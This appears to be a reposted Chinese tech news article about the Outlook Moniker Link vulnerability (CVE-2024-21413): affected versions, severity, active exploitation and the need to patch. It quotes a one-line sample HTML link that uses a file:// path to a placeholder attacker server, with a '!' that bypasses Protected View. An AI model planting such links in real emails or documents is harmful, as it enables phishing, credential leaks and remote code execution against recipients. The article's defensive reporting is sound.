聲明：該文章來自（藍點網）版權由原作者所有，K2OS渲染引擎提供網頁加速服務。

CVE-2024-21413 漏洞是微軟在 2024 年 1 月公布并修復的安全漏洞，該漏洞由網絡安全公司 CheckPoint 安全研究人員 Haifei Li 發(fā)現并通報給微軟，主要涉及到 Outlook 郵件客戶端的遠程代碼執(zhí)行問題。

該漏洞影響 Microsoft Office 2016、Microsoft Office 2019、Microsoft Office LTSC 2021、Microsoft 365 企業(yè)版應用，漏洞評分達到 9.8/10 分。

這枚漏洞的描述是存在缺陷的 Outlook 版本打開帶有惡意鏈接的電子郵件時輸入驗證不當，借助漏洞黑客可以繞過受保護的視圖 (該視圖會以只讀方式打開 Office 文件用來阻擋嵌入的有害內容) 并以編輯模式打開惡意的 Office 文件。

在這種情況下黑客可以向目標組織發(fā)送包含惡意代碼的釣魚郵件，只需要目標組織的員工打開該郵件即可觸發(fā)漏洞并實現遠程代碼執(zhí)行，因此造成的危害還是非常大的。

目前已經有黑客開始利用這枚漏洞展開攻擊，考慮到其潛在危害性，如果企業(yè)至今沒有升級 Outlook 版本封堵漏洞那可能會出現嚴重的安全問題。

CheckPoint 的研究人員也透露了該漏洞的工作方式：

這個被稱為 Moniker Link 的漏洞可以讓黑客使用 file:// 文件協議指向黑客控制的服務器 URL 并添加感嘆號來繞過 Outlook 內置的受保護視圖。

#下面為示例代碼，基于安全考慮研究人員并未公布完整的利用方式 *<a?href="file:///\\10.10.111.111\test\test.rtf!something">CLICK?ME</a>*

考慮到這枚漏洞已經公布 1 年了，這時候才有黑客利用也不是讓人驚訝的事情，如果都 1 年了企業(yè)還沒有更新 Outlook 封堵漏洞那也只能自求多福了。

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關注數據與安全，洞悉企業(yè)級服務市場：https://www.ijiandao.com/